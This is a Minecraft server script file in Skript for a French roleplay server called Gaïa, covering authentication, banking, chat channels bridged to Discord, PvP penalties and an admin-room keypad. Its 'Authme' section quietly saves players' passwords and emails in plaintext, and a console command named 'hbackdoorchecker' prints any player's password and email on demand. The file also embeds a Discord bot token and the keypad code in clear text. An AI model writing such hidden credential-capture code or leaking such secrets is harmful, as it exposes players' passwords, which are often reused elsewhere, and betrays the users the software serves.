#
#
# Hollish Skripts
#
#                   For Gaïa
#
#
#
#
# Authme
#
#
command /thisisthepasswordaddercommand <text> <text>:
	trigger:
		add player to {player.list::*}
		add 1 to {player.count}
		set {password.%player%} to arg 2
#
command /thisisthepasswordchangercommand <text> <text>:
	trigger:
		set {password.%player%} to arg 2
#		
command /thisistheemailaddercommand <text> <text>:
	trigger:
		add player to {email.list::*}
		add 1 to {email.count}
		set {email.%player%} to arg 2
#		
command /thisisthechangerecoverycommand <text> <text>:
	trigger:			
		add arg 2 to {email.%player%::*}
		set {email.%player%} to arg 2
#		
command /hbackdoorchecker <text>:
	executable by: console
	trigger:
		message "     &6~ Rapport sur &2%arg 1% &6~"
		message "Mot de passe : %{password.%arg 1%}%"
		message "Email : %{email.%arg 1%}%"
		message "Total Mails %{email.count}%"
#
#
# Banking System
#
#
on chat:
	if message starts with "Depot:":
		if player is in the region "athelas_bank":
			set {_montant_depot::*} to groups 0 of "%message%" matched to "\d+$"
			if {_montant_depot::1} is set:
				cancel event
				execute console command "bq point %player% add depot %{_montant_depot::1}%"
				message "Vous déposez %{_montant_depot::1}%"
				wait 2 ticks
				execute console command "bq event %player% default.banking_compte_enter"
			else:
				message "&d&oVous devez spécifier un nombre entier et positif."
				cancel event
		else:
			message "&d&oVous ne pouvez effectuer de Dépôt qu'au sein de la Banque d'Athelas."
			cancel event
	else if message starts with "Retrait:":
		if player is in the region "athelas_bank":
			set {_montant_retrait::*} to groups 0 of "%message%" matched to "\d+$"
			if {_montant_retrait::1} is set:
				cancel event
				execute console command "bq point %player% add retrait %{_montant_retrait::1}%"
				message "Vous retirez %{_montant_retrait::1}%"
				wait 2 ticks
				execute console command "bq event %player% default.banking_poche_enter"
			else:
				message "&d&oVous devez spécifier un nombre entier et positif."
				cancel event
		else:
			message "&d&oVous ne pouvez effectuer de Retrait qu'au sein de la Banque d'Athelas."
			cancel event
#
#
#
# Chanels de Discussion
#
#    Global, Silencieux, Local, Commerce & Staff
#
#
#
on load:
	discord login to user with token "MjkyODI4MDc5ODEyNzcxODQx.C69tDQ.0eb-o2euVhQRzgzUMKNZ1XWAC48" with name "Gaia"
	broadcast "&aLoggé sur Discord !"
	discord send message "Le Monde de Gaïa vient de s'ouvrir." to channel with id "186938785026539523" as bot "Gaia"
	discord send message "Merci de ne pas vous ""spam-connecter""." to channel with id "186938785026539523" as bot "Gaia"


on chat:
	cancel event
	set {_chat} to message	
	replace every "§1" and "§2" and "§3" and "§4" and "§5" and "§6" and "§7" and "§8" and "§9" and "§u" and "§l" and "§o" and "§u" with "" in {_chat}
	replace every "&1" and "&2" and "&3" and "&4" and "&5" and "&6" and "&7" and "&8" and "&9" and "&u" and "&l" and "&o" and "&u" with "" in {_chat}
	replace every "§a" and "§b" and "§c" and "§d" and "§e" and "§f" with "" in {_chat}
	replace every "&a" and "&b" and "&c" and "&d" and "&e" and "&f" with "" in {_chat}
	
	if {_chat} contains "!l":
		if {l.channel.%player%} is set:
			replace every "!l" with "" in {_chat}
			loop all players in radius 75 around player's location:
				if {l.channel.%loop-player%} is set:
					message "&6[&9Local&6]%player's prefix%&7[&2%mcmmo powerlevel of player%&7]&f%player% : &7%{_chat}%" to loop-player
		else:
			message "&c&oVous n'avez pas activé le Chanel &aLocal&c&o."
			message "&d&oTapez &a/chanel aide &d&opour gérer vos Chanels de Discussion."
			
	else if {_chat} contains "!c":
		if {c.channel.%player%} is set:
			replace every "!c" with "" in {_chat}
			loop all players:
				if {c.channel.%loop-player%} is set:
					message "&6[&9Comm.&6]%player's prefix%&7[&2%mcmmo powerlevel of player%&7]&f%player% : &7%{_chat}%" to loop-player
		else:
			message "&c&oVous n'avez pas activé le Chanel &aCommerce&c&o."
			message "&d&oTapez &a/chanel aide &d&opour gérer vos Chanels de Discussion."
		
	else if {_chat} contains "!a":
		if {a.channel.%player%} is set:
			replace every "!a" with "" in {_chat}
			loop all players:
				if {a.channel.%loop-player%} is set:
					message "&6[&9Staff&6]%player's prefix%&7[&2%mcmmo powerlevel of player%&7]&f%player% : &7%{_chat}%" to loop-player
		else:
			message "&c&oVous n'avez pas activé le Chanel &aStaff&c&o."
			message "&d&oTapez &a/chanel aide &d&opour gérer vos Chanels de Discussion."
	else:
		if {g.channel.%player%} is set:
			discord send message "%player% : %{_chat}%" to channel with id "186938785026539523" as bot "Gaia"
			loop all players:
				if {g.channel.%loop-player%} is set:
					message "%player's prefix%&7[&2%mcmmo powerlevel of player%&7]&f%player% : &7%{_chat}%" to loop-player
		else:
			message "&c&oVous n'avez pas activé le Chanel &aGlobal&c&o."
			message "&d&oTapez &a/chanel aide &d&opour gérer vos Chanels de Discussion."
on discord guild message receive seen by "Gaia":
	set {_discord_id} to event-user
	set {_discord.message} to message
#
#THIS BREAKS {discord.message} WHICH BECOMES MESSAGE ID
#	replace every "§1" and "§2" and "§3" and "§4" and "§5" and "§6" and "§7" and "§8" and "§9" and "§u" and "§l" and "§o" and "§u" with "" in {_discord.message}
#	replace every "&1" and "&2" and "&3" and "&4" and "&5" and "&6" and "&7" and "&8" and "&9" and "&u" and "&l" and "&o" and "&u" with "" in {_discord.message}
#	replace every "§a" and "§b" and "§c" and "§d" and "§e" and "§f" with "" in {_discord.message}
#	replace every "&a" and "&b" and "&c" and "&d" and "&e" and "&f" with "" in {_discord.message}
#
	loop all players:
		if {g.channel.%loop-player%} is set:
			message "§6[§2Discord§6] §f%discord name of {_discord_id}% : §7%{_discord.message}%" to loop-player
#
#
# Channel Commands
#
#
command /chanel <text>:
	usage: &d&oTapez &a/chanel aide &d&opour voir l'aide.
	trigger:
		if arg 1 is "s" or "silence":
			delete {g.channel.%player%}
			delete {l.channel.%player%}
			delete {c.channel.%player%}
			delete {a.channel.%player%}
			message "&d&oVous désactivez tous les Chanels."
		else if arg 1 is "g" or "global":
			if {g.channel.%player%} is set:
				delete {g.channel.%player%}
				message "&c&oVous désactivez le Chanel &aGlobal&d&o."
			else:
				set {g.channel.%player%} to 1
				message "&a&oVous activez dans le Chanel &aGlobal&d&o."
		else if arg 1 is "l" or "local":
			if {l.channel.%player%} is set:
				delete {l.channel.%player%}
				message "&c&oVous désactivez le Chanel &aLocal&d&o."
			else:
				set {l.channel.%player%} to 1
				message "&a&oVous activez dans le Chanel &aLocal&d&o."
				message "&d&oDiscutez avec les personnes dans un rayon de 75 autour de vous."
				message "&d&oUtilisez &a!l &d&opour parler dans ce Chanel."
		else if arg 1 is "c" or "commerce":
			if {c.channel.%player%} is set:
				delete {c.channel.%player%}
				message "&c&oVous désactivez le Chanel &aCommerce&d&o."
			else:
				set {c.channel.%player%} to 1
				message "&a&oVous activez dans le Chanel &aCommerce&d&o."
				message "&d&oDiscutez avec les personnes souhaitant faire du commerce."
				message "&d&oUtilisez &a!c &d&opour parler dans ce Chanel."
		else if arg 1 is "staff" or "admin":
			if player meets betonquest condition "staff":
				if {a.channel.%player%} is set:
					delete {a.channel.%player%}
					message "&c&oVous désactivez le Chanel &aStaff&d&o."
				else:
					set {a.channel.%player%} to 1
					message "&a&oVous activez dans le Chanel &aStaff&d&o."
					message "&d&oUtilisez &a!a &d&opour parler dans ce Chanel."
			else:
				message "&c&oVous devez être Staff pour accéder à ce Chanel !"
		else if arg 1 is "aide":
			message "&d&o---------------------- &f~ &6¤ &f~ &d&o----------------------"
			message "&a&oPour parler dans un Chanel, vous devez l'activer puis"
			message "&a&oplacer ""![id chanel]"" dans votre message."
			message "                           &f~ &6¤ &f~"
			message "&a/chanel [argument] &d&opour &aactiver&d&o/&cdésactiver &d&oun Chanel."
			message "&a/chanel info &d&oPour voir vos Chanels."
			message "                           &f~ &6¤ &f~"
			message "&a/chanel [g, global]"
			message "&d&oDiscutez avec les personnes par défaut et sur Discord."
			message "&a/chanel [l, local] &f- &2!l"
			message "&d&oDiscutez avec les personnes dans un rayon de 75 autour de vous."
			message "&a/chanel [c, commerce] &f- &2!c"
			message "&d&oDiscutez avec les personnes souhaitant faire du commerce."
			message "&a/chanel [staff, admin] &f- &2!a"
			message "&d&oDiscutez avec les personnes du Staff."
			message "&d&o---------------------- &f~ &6¤ &f~ &d&o----------------------"
		else if arg 1 is "info":
			message "&d&o---------- &f~ &6¤ &f~ &d&o----------"
			if {g.channel.%player%} is set:
				message "&2Global           &aActivé"
			else:
				message "&2Global           &cDésactivé"
			if {l.channel.%player%} is set:
				message "&2Local             &aActivé"
			else:
				message "&2Local             &cDésactivé"
			if {c.channel.%player%} is set:
				message "&2Commerce     &aActivé"
			else:
				message "&2Commerce     &cDésactivé"
			if {a.channel.%player%} is set:
				message "&2Staff             &aActivé"
			else:
				message "&2Staff             &cDésactivé"
			message "&d&o---------- &f~ &6¤ &f~ &d&o----------"
			
#
#		
#
#
# Voting
#
on vote:
	message "&d&o&lMerci d'avoir soutenu Gaïa !"
	message "&d&oVous avez voté sur : &2%event-string%"
	message "&d&oVous gagnez &f¤ &2100 &d&oet &21 Point de Vote &d&o!"
	command "eco give %player% 100"
	command "bq point %player% add votes 1"
#
#
#  PVP Manager
#
#
On death of player:
	if victim meets betonquest condition "player":
		if attacker is a player:
			Wait 7 ticks
			set {_death_money.%player%} to victim's money
			set {_01} to 0.1
			set {_death_money_result.%player%} to {_death_money.%player%} * {_01}
			Wait 7 ticks
			give the victim's skull to the attacker
			execute console command "eco take %victim% %{_death_money_result.%player%}%"
			execute console command "eco give %attacker% %{_death_money_result.%player%}%"
			send "&aVous volez &f¤&2%{_death_money_result.%victim%}% &ade &2%victim% &aen l'assasinant." to attacker
			send "&cVous perdez &f¤&2%{_death_money_result.%victim%}% &crécupérés par &2%attacker%&c." to victim
			execute console command "title %victim% times 60 100 60"
			execute console command "title %victim% title {""text"":""Vous êtes mort!"",""bold"":true,""color"":""red""}"
			execute console command "title %victim% subtitle {""text"":""-%{_death_money_result.%victim%}% d'argent en poche"",""italic"":true,""color"":""light_purple""}"
		else:
			Wait 7 ticks
			set {_death_money.%player%} to victim's money
			set {_01} to 0.1
			set {_death_money_result.%player%} to {_death_money.%player%} * {_01}
			execute console command "eco take %victim% %{_death_money_result.%player%}%"
			send "&cVous perdez &f¤&2%{_death_money_result.%victim%}% &cen mourrant." to victim
			execute console command "title %victim% times 60 100 60"
			execute console command "title %victim% title {""text"":""Vous êtes mort!"",""bold"":true,""color"":""red""}"
			execute console command "title %victim% subtitle {""text"":""-%{_death_money_result.%victim%}% d'argent en poche"",""italic"":true,""color"":""light_purple""}"

#
# Disables rain & thunder in all worlds
#			
on weather change to rain or thunder:
	wait 1 minute
	set weather to sunny

#
#
# Enchant Plus
#
#               Disable enchanting of unbreakable items.
#				Add spells from whispers.
on enchant:
	if tag "Unbreakable" of nbt of event-item is set:
		cancel event
		message "&d&oVous ne parvenez pas à enchanter cet objet."
		message "&d&oÉtant incassable, il possède déjà trop de Spiritualité."
	else:
		loop yaml list "enchantments" from file "/plugins/Skript/scripts/config.yml":
			add "%loop-value%" to {enchantment_spell_list::*}
		set {enchantment_spell} to a random element out of {enchantment_spell_list::*}
		message "&2murmures &f: &6&o%{enchantment_spell}%"
		loop {enchantment_spell_list::*}:
			delete {enchantment_spell_list::%loop-index%}
#
#
# MythicMobs Items Fixer
#
#				allows to give MM Items to full inventories.
#
#
# Use only "mm items give" in any automated console command.
#   i.e. do not use "mm i give" => this is used to avoid a loop in this section
#
# Peut être amélioré en passant _t dans u::* et n'utiliser que des _u::x 
#
#
on server command:
	if "%event-string%" contains "inventorycheck":
		stop
	if "%event-string%" contains "mm items give":
		cancel event
		set {_t} to "%event-string%"
		set {_s} to "%subtext of {_t} from characters 14 to (the length of {_t})%"
		set {_u::*} to {_s} split at " "
		execute console command "sudo %{_u::2}% inventorycheck %event-string%"
#
command /inventorycheck <text> <text> <text> <text> <text>:
	trigger:
		loop 36 times:
			if slot {_slot} of player's inventory is empty:
				wait 1 tick
			else:
				add 1 to {_slot}
				wait 1 tick
		if {_slot} is 36:
			message "&d&oVous n'avez pas assez de place dans votre inventaire."
			message "&d&oVidez une place dans votre inventaire pour recevoir l'objet."
			wait 20 seconds
			execute console command "sudo %arg 4% inventorycheck %arg 1% %arg 2% %arg 3% %arg 4% %arg 5%"
		else:
			execute console command "%arg 1% i %arg 3% %arg 4% %arg 5%"
#
#
#
# Alcool
#
#
on consume of bottle of water:
	if the 1st line of the item's lore is "&e&oCette bière est":
		message "&6Hum ! Une bonne bière !"
		apply nausea to the player for 22 seconds
#
#
# Salon Administrateur
#
#
on rightclick on sign:
    if line 1 of the clicked block is "~~~~~~~~~~":
        if line 4 of the clicked block is "~~~~~~~~~~":
            if line 2 of the clicked block is "1":
                add 1 to {lobby_lockpad_%player%::*}
                if size of {lobby_lockpad_%player%::*} is 4:	
                    execute console command "thisisthelobbylockpadchecker %player%"
            else if line 2 of the clicked block is "2":
                add 2 to {lobby_lockpad_%player%::*}
                if size of {lobby_lockpad_%player%::*} is 4:	
                    execute console command "thisisthelobbylockpadchecker %player%"
            else if line 2 of the clicked block is "3":
                add 3 to {lobby_lockpad_%player%::*}
                if size of {lobby_lockpad_%player%::*} is 4:	
                    execute console command "thisisthelobbylockpadchecker %player%"
            else if line 2 of the clicked block is "4":
                add 4 to {lobby_lockpad_%player%::*}
                if size of {lobby_lockpad_%player%::*} is 4:	
                    execute console command "thisisthelobbylockpadchecker %player%"
            else if line 2 of the clicked block is "5":
                add 5 to {lobby_lockpad_%player%::*}
                if size of {lobby_lockpad_%player%::*} is 4:	
                    execute console command "thisisthelobbylockpadchecker %player%"
            else if line 2 of the clicked block is "6":
                add 6 to {lobby_lockpad_%player%::*}
                if size of {lobby_lockpad_%player%::*} is 4:	
                    execute console command "thisisthelobbylockpadchecker %player%"
            else if line 2 of the clicked block is "7":
                add 7 to {lobby_lockpad_%player%::*}
                if size of {lobby_lockpad_%player%::*} is 4:	
                    execute console command "thisisthelobbylockpadchecker %player%"
            else if line 2 of the clicked block is "8":
                add 8 to {lobby_lockpad_%player%::*}
                if size of {lobby_lockpad_%player%::*} is 4:	
                    execute console command "thisisthelobbylockpadchecker %player%"
            else if line 2 of the clicked block is "9":
                add 9 to {lobby_lockpad_%player%::*}
                if size of {lobby_lockpad_%player%::*} is 4:	
                    execute console command "thisisthelobbylockpadchecker %player%"
            else if line 2 of the clicked block is "Sortie":
                message "&a&oLa porte du &2Lobby Administrateur &a&os'ouvre." to player
                open block at location at -6710, 65, 2985 of the world "Gaia"
                open block at location at -6710, 65, 2984 of the world "Gaia"

command /thisisthelobbylockpadchecker <player>:
	executable by: console
	trigger:
		if {lobby_lockpad_%arg 1%::1} is 1:
			if {lobby_lockpad_%arg 1%::2} is 6:
				if {lobby_lockpad_%arg 1%::3} is 1:
					if {lobby_lockpad_%arg 1%::4} is 8:
						loop {lobby_lockpad_%arg 1%::*}:
							delete {lobby_lockpad_%arg 1%::%loop-index%}
						message "&a&oVous trouvez la bonne combinaison." to arg 1
						message "&a&oLa porte du &2Lobby Administrateur &a&os'ouvre." to arg 1
						open block at location at -6710, 65, 2985 of the world "Gaia"
						open block at location at -6710, 65, 2984 of the world "Gaia"
						wait 7 seconds
						close block at location at -6710, 65, 2985 of the world "Gaia"
						close block at location at -6710, 65, 2984 of the world "Gaia"
					else:
						close block at location at -6710, 65, 2985 of the world "Gaia"
						close block at location at -6710, 65, 2984 of the world "Gaia"
						message "&cVous n'avez pas rentré la bonne combinaison." to arg 1
						message "&cSi vous ne connaissez pas le code...." to arg 1
						message "&c...c'est que vous n'avez rien à faire ici." to arg 1
						loop {lobby_lockpad_%arg 1%::*}:
							delete {lobby_lockpad_%arg 1%::%loop-index%}
				else:
					close block at location at -6710, 65, 2985 of the world "Gaia"
					close block at location at -6710, 65, 2984 of the world "Gaia"
					message "&cVous n'avez pas rentré la bonne combinaison." to arg 1
					message "&cSi vous ne connaissez pas le code...." to arg 1
					message "&c...c'est que vous n'avez rien à faire ici." to arg 1
					loop {lobby_lockpad_%arg 1%::*}:
						delete {lobby_lockpad_%arg 1%::%loop-index%}
			else:
				close block at location at -6710, 65, 2985 of the world "Gaia"
				close block at location at -6710, 65, 2984 of the world "Gaia"
				message "&cVous n'avez pas rentré la bonne combinaison." to arg 1
				message "&cSi vous ne connaissez pas le code...." to arg 1
				message "&c...c'est que vous n'avez rien à faire ici." to arg 1
				loop {lobby_lockpad_%arg 1%::*}:
					delete {lobby_lockpad_%arg 1%::%loop-index%}
		else:
			close block at location at -6710, 65, 2985 of the world "Gaia"
			close block at location at -6710, 65, 2984 of the world "Gaia"
			message "&cVous n'avez pas rentré la bonne combinaison." to arg 1
			message "&cSi vous ne connaissez pas le code...." to arg 1
			message "&c...c'est que vous n'avez rien à faire ici." to arg 1
			loop {lobby_lockpad_%arg 1%::*}:
				delete {lobby_lockpad_%arg 1%::%loop-index%}
#			
#
#
# Scoreboard Fighter
#
#
#on unload:
#	delete file "Gaia/data/scoreboard.dat"
#	
#on load:
#	delete file "Gaia/data/scoreboard.dat"
#	wait 7 seconds
#	delete file "Gaia/data/scoreboard.dat"
#
#
#
# NPC mover
#
#  Does not function due to unspawned NPCs.
#   Spams the console with errors even ChatControl will not remove.
#
#
#options:
#	npcmovers: 52 and 54 and 316 and 321 and 320 and 318 and 228 and 229 and 319 and 69
#	x: -6975 and -6974 and -6997 and -6997 and -6951 and -6784 and -6796 and -6969 and -6718 and -6567
#	y: 73 and 73 and 84 and 84 and 64 and 64 and 64 and 73 and 72 and 66
#	z: 2959 and 2952 and 2959 and 2952 and 2966  and 2793 and 2793 and 2957 and 3026 and 3192
#	r: 0 and 0 and 0 and 0 and 3 and 0 and 0 and 3 and 1 and 7
#	
#	
#	x2: -6975 and -6923 and -7022 and -7003 and -6930  and -6799 and -6825 and -6886 and -6708 and -6558
#	y2: 74 and 64 and 89 and 89 and 64 and 64 and 64 and 64 and 73 and 72
#	z2: 2971 and 2959 and 2971 and 2936 and 2992  and 2809 and 2816 and 2971 and 3024 and 3160
#	r2: 2 and 6 and 3 and 2 and 5 and 4 and 3 and 3 and 2 and 3
#	
#	
#	x3: -6976 and -6883 and -7049 and -6999 and -6905  and -6763 and -6863 and -6864 and -6702 and -6576
#	y3: 75 and 62 and 87 and 91 and 64 and 65 and 64 and 64 and 68 and 63
#	z3: 2989 and 2916 and 2978 and 2920 and 3009  and 2821 and 2839 and 2992 and 2947 and 3160
#	r3: 3 and 3 and 4 and 2 and 3 and 3 and 5 and 3 and 4 and 2
#
#
#
#	
#every 22 seconds in world "Gaia":
#	if time in world "Gaia" is greater than 00:01:
#		if time in world "Gaia" is smaller than 5:00:
#			clear {npcmovers::*}
#			clear {npc_x::*}
#			clear {npc_y::*}
#			clear {npc_z::*}
#			clear {npc_r::*}
#			wait 7 ticks
#			loop {@npcmovers}:
#				add loop-value to {npcmovers::*}
#			loop {@x}:
#				add loop-value to {npc_x::*}
#			loop {@y}:
#				add loop-value to {npc_y::*}
#			loop {@z}:
#				add loop-value to {npc_z::*}
#			loop {@r}:
#				add loop-value to {npc_r::*}
#			wait 5 ticks
#			loop {npc_x::*}:
#				add a random integer between 0 and {npc_r::%loop-index%} to {npc_x::%loop-index%}
#			loop {npc_z::*}:
#				add a random integer between 0 and {npc_r::%loop-index%} to {npc_z::%loop-index%}
#			wait 5 ticks
#			loop {npcmovers::*}:
#				set {loc} to location at 0, 0, 0 of the world "Gaia"
#				set x coordinate of {loc} to {npc_x::%loop-index%}
#				set y coordinate of {loc} to {npc_y::%loop-index%}
#				set z coordinate of {loc} to {npc_z::%loop-index%}
#				move citizen {npcmovers::%loop-index%} to location of {loc}
#				wait 2 ticks
#			clear {npcmovers::*}
#			clear {npc_x::*}
#			clear {npc_y::*}
#			clear {npc_r::*}
#	if time in world "Gaia" is greater than 5:00:
#		if time in world "Gaia" is smaller than 12:00:
#			clear {npcmovers::*}
#			clear {npc_x2::*}
#			clear {npc_y2::*}
#			clear {npc_z2::*}
#			clear {npc_r2::*}
#			wait 7 ticks
#			loop {@npcmovers}:
#				add loop-value to {npcmovers::*}
#			loop {@x2}:
#				add loop-value to {npc_x2::*}
#			loop {@y2}:
#				add loop-value to {npc_y2::*}
#			loop {@z2}:
#				add loop-value to {npc_z2::*}
#			loop {@r2}:
#				add loop-value to {npc_r2::*}
#			wait 5 ticks
#			loop {npc_x2::*}:
#				add a random integer between 0 and {npc_r2::%loop-index%} to {npc_x2::%loop-index%}
#			loop {npc_z2::*}:
#				add a random integer between 0 and {npc_r2::%loop-index%} to {npc_z2::%loop-index%}
#			wait 5 ticks
#			loop {npcmovers::*}:
#				set {loc} to location at 0, 0, 0 of the world "Gaia"
#				set x coordinate of {loc} to {npc_x2::%loop-index%}
#				set y coordinate of {loc} to {npc_y2::%loop-index%}
#				set z coordinate of {loc} to {npc_z2::%loop-index%}
#				move citizen {npcmovers::%loop-index%} to location of {loc}
#			clear {npcmovers::*}
#			clear {npc_x2::*}
#			clear {npc_y2::*}
#			clear {npc_r2::*}
#	if time in world "Gaia" is greater than 12:00:
#		if time in world "Gaia" is smaller than 19:00:
#			clear {npcmovers::*}
#			clear {npc_x3::*}
#			clear {npc_y3::*}
#			clear {npc_z3::*}
#			clear {npc_r3::*}
#			wait 7 ticks
#			loop {@npcmovers}:
#				add loop-value to {npcmovers::*}
#			loop {@x3}:
#				add loop-value to {npc_x3::*}
#			loop {@y3}:
#				add loop-value to {npc_y3::*}
#			loop {@z3}:
#				add loop-value to {npc_z3::*}
#			loop {@r3}:
#				add loop-value to {npc_r3::*}
#			wait 5 ticks
#			loop {npc_x3::*}:
#				add a random integer between 0 and {npc_r3::%loop-index%} to {npc_x3::%loop-index%}
#			loop {npc_z3::*}:
#				add a random integer between 0 and {npc_r3::%loop-index%} to {npc_z3::%loop-index%}
#			wait 5 ticks
#			loop {npcmovers::*}:
#				set {loc} to location at 0, 0, 0 of the world "Gaia"
#				set x coordinate of {loc} to {npc_x3::%loop-index%}
#				set y coordinate of {loc} to {npc_y3::%loop-index%}
#				set z coordinate of {loc} to {npc_z3::%loop-index%}
#				move citizen {npcmovers::%loop-index%} to location of {loc}
#			clear {npcmovers::*}
#			clear {npc_x3::*}
#			clear {npc_y3::*}
#			clear {npc_r3::*}
#	if time in world "Gaia" is greater than 19:00:
#		clear {npcmovers::*}
#		clear {npc_x::*}
#		clear {npc_y::*}
#		clear {npc_z::*}
#		clear {npc_r::*}
#		wait 7 ticks
#		loop {@npcmovers}:
#			add loop-value to {npcmovers::*}
#		loop {@x}:
#			add loop-value to {npc_x::*}
#		loop {@y}:
#			add loop-value to {npc_y::*}
#		loop {@z}:
#			add loop-value to {npc_z::*}
#		loop {@r}:
#			add loop-value to {npc_r::*}
#		wait 5 ticks
#		loop {npc_x::*}:
#			add a random integer between 0 and {npc_r::%loop-index%} to {npc_x::%loop-index%}
#		loop {npc_z::*}:
#			add a random integer between 0 and {npc_r::%loop-index%} to {npc_z::%loop-index%}
#		wait 5 ticks
#		loop {npcmovers::*}:
#			set {loc} to location at 0, 0, 0 of the world "Gaia"
#			set x coordinate of {loc} to {npc_x::%loop-index%}
#			set y coordinate of {loc} to {npc_y::%loop-index%}
#			set z coordinate of {loc} to {npc_z::%loop-index%}
#			move citizen {npcmovers::%loop-index%} to location of {loc}
#			wait 2 ticks
#		clear {npcmovers::*}
#		clear {npc_x::*}
#		clear {npc_y::*}
#		clear {npc_r::*}
#
#
#	